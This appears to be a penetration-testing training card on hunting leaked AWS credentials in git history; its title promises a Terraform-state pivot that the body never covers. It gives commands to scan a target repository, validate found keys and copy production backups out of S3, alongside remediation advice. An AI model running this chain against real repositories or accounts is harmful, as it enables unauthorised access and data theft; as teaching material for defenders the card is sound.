Terraform State-to-AWS Pivot: Credential Extraction Chain from Leaked State to Live Resources
Theory
Why This Matters
In 2019, a developer at a major e-commerce platform accidentally committed a .env file containing production AWS credentials to a public GitHub repository. The file was removed in the next commit three minutes later. Despite the rapid deletion, automated credential scrapers — running continuously against GitHub's public event stream — detected and exfiltrated the credentials within 47 seconds of the initial push. The credentials were used to access an S3 bucket containing 2.4 million customer email addresses before the developer had finished writing the incident report. This scenario — credential committed, "deleted," then exploited via git history — repeats dozens of times every week across public repositories. The 2022 Trufflesec research report found valid AWS credentials in over 4,000 unique public GitHub repositories, with an average time-to-exploitation of under 2 minutes for high-privilege keys.
Core Concept
Git's fundamental design principle is that history is append-only. When a file is deleted in a commit, the deletion is recorded as a new commit that removes the file from the working tree, but all previous commits — including those that added the file — remain permanently accessible in the repository's object store. A git history containing a credential commit followed by a deletion commit still exposes the credential via git show <commit-hash>, git log -p, or git diff against the parent of the deletion commit.
Hardcoded credentials enter git repositories through several paths: .env files committed without a corresponding .gitignore entry; credentials in configuration files (config.yml, settings.py, application.properties); inline test credentials used during development; and CI/CD configuration files that contain credentials in plaintext rather than referencing secrets management.
Automated scanning tools target this pattern specifically. truffleHog uses both regex matching and Shannon entropy analysis — identifying high-entropy strings (which random-looking keys like AWS access keys have) even without matching a known credential pattern. gitleaks uses a TOML-based ruleset and is faster for large repositories. Both tools scan the entire git history, not just the current HEAD.
aws sts get-caller-identity is the standard validation step — it confirms that a credential is valid and returns the IAM identity without requiring any other permissions. A successful response means the credential is active and usable. After validation, the scope of access depends on the attached policies.
git-filter-repo is the recommended tool for history rewrite after credential exposure — it is faster and safer than the deprecated git filter-branch. However, history rewrite is only effective for private repositories where all clones can be updated; for public repositories, the credential must be rotated immediately because it may already be cached by scrapers.
Technical Deep-Dive
# ── Manual git history search ─────────────────────────────────
# Clone the target repository
git clone https://github.com/targetorg/infrastructure-configs.git
cd infrastructure-configs
# Search all commits for AWS credential patterns
git log --all -p | grep -E "(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AKIA[A-Z0-9]{16})"
# Search for .env files in history
git log --all --full-history -- "**/.env" "*.env" ".env"
# Show the content of a specific file at a specific commit
git show <COMMIT_HASH>:.env
# or view the diff that removed it
git show <COMMIT_HASH>
# Search across all refs including stashes and remote branches
git log --all --oneline | awk '{print $1}' | xargs -I{} git diff-tree --no-commit-id -r {} | grep ".env"
# ── Automated scanning ────────────────────────────────────────
# truffleHog — entropy and regex scanning of git history
trufflehog git file://. --json | jq .
# For a remote repo
trufflehog github --repo https://github.com/targetorg/infrastructure-configs
# gitleaks — faster, TOML rule-based
gitleaks detect --source . --log-opts "--all" --report-format json --report-path findings.json
cat findings.json | jq '.[] | {File, Secret, StartLine, Commit}'
# ── Credential validation ──────────────────────────────────────
export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="extracted-secret"
# Validate without needing any permissions
aws sts get-caller-identity
# If valid: returns Account, UserId, Arn
# Check key metadata (age, status)
aws iam list-access-keys --user-name $(aws iam get-user --query User.UserName --output text)
# ── S3 access and exfiltration ────────────────────────────────
aws s3 ls
aws s3 ls s3://company-production-backups --recursive
aws s3 cp s3://company-production-backups/backup-2024-01.sql.gz ./
# ── Remediation: git history rewrite after exposure ───────────
# Install git-filter-repo (pip3 install git-filter-repo)
git filter-repo --path .env --invert-paths
git push origin --force --all # requires force push; coordinate with team
# IMPORTANT: rotate credentials before rewriting history — scrapers may already have them
Security Assessment Methodology
- Clone the target repository — obtain the full git history. For GitHub targets, also check archived forks and Gists from the same organisation.
- Run truffleHog with entropy mode —
trufflehog git file://. --jsonscans all commits, branches, and tags for high-entropy strings and known credential patterns. Review JSON output forAWS,SECRET,KEY,TOKENfindings. - Run gitleaks as a second pass — the two tools use different detection approaches and have complementary coverage.
gitleaks detect --source . --log-opts "--all"scans the same history with a signature-based ruleset. - Perform manual targeted searches — use
git log --all -p | grep -E "AKIA[A-Z0-9]{16}"to find AWS access key IDs specifically. Also search for.env,credentials,secrets.yml, andterraform.tfvarsfile paths in history. - Validate discovered credentials — export each credential and run
aws sts get-caller-identity. Only active credentials represent a current exposure; inactive keys are historical findings requiring rotation confirmation. - Enumerate access scope — for each valid credential, determine the attached IAM policies and enumerate accessible S3 buckets, secrets, and databases.
- Document time-to-exposure — use
git log --format="%H %ai %s" --allto find when credentials were committed and when they were removed. Report this window to demonstrate real exposure duration.
Defensive Countermeasure — Add pre-commit hooks with gitleaks to all developer workstations and enforce them server-side with a GitHub Actions workflow using
gitleaks/gitleaks-action. Configure the hook to block any commit containing strings matchingAKIA[A-Z0-9]{16}or high-entropy 40-character strings. Additionally, enable GitHub Secret Scanning (built-in for public repos, requires GitHub Advanced Security for private repos) which automatically notifies AWS to invalidate detected credentials via a partner alert mechanism — AWS revokes keys detected by GitHub Secret Scanning within minutes.
Common Assessment Errors
- Only scanning HEAD or the main branch — deleted credentials are never at HEAD. Always include
--allin git log commands to cover all branches, tags, and the reflog. - Relying on a single tool — truffleHog and gitleaks have different false-positive and false-negative rates. Run both and cross-reference findings.
- Not checking forks — if the repository was public at any point, forks may exist that captured the credential-containing commits before the repository was made private. Search GitHub for forks with
gh api /repos/org/repo/forks. - Treating inactive credentials as resolved — an IAM access key in
Status: Inactivewas disabled, not deleted. It can be re-activated by any principal withiam:UpdateAccessKey. The correct remediation is deletion plus credential rotation. - Forgetting CI/CD artefact stores — Jenkins build logs, GitHub Actions run logs, and CircleCI artefacts may have captured credentials that appeared in environment variables during pipeline execution. These are separate evidence sources.
- Skipping rotation before history rewrite — history rewrite removes the credential from the repository but does not invalidate it. The credential must be rotated first. Any delay between rewrite and rotation is an additional exposure window.
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0053 | Knowledge of cloud infrastructure vulnerabilities and attack surfaces | Explains how git's append-only history model creates permanent credential exposure and how automated scrapers exploit this |
| K0167 | Knowledge of systems security testing methodologies | Develops a seven-step git credential hunting methodology from repository cloning through scope enumeration and time-to-exposure documentation |
| S0073 | Skill in using penetration testing tools and techniques against cloud infrastructure | Trains use of truffleHog entropy scanning, gitleaks signature detection, manual grep-based git history search, and AWS CLI credential validation |
| T0144 | Task: Conduct penetration testing on cloud-hosted systems | Directly exercises the complete git-to-S3 attack chain including automated scanning, manual verification, and access scope analysis |
| T0395 | Task: Recommend security controls for cloud environments | Develops pre-commit hook configuration, GitHub Secret Scanning setup, and the correct rotation-before-rewrite remediation sequence |
Further Reading
- "How Secrets Leak from Git Repositories" — TruffleHog Documentation and Research Blog
- "gitleaks: Protecting Your Codebase from Secret Leaks" — gitleaks GitHub README and ruleset documentation
- "AWS Best Practices for Security, Identity, and Compliance: Credential Management" — AWS Documentation
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.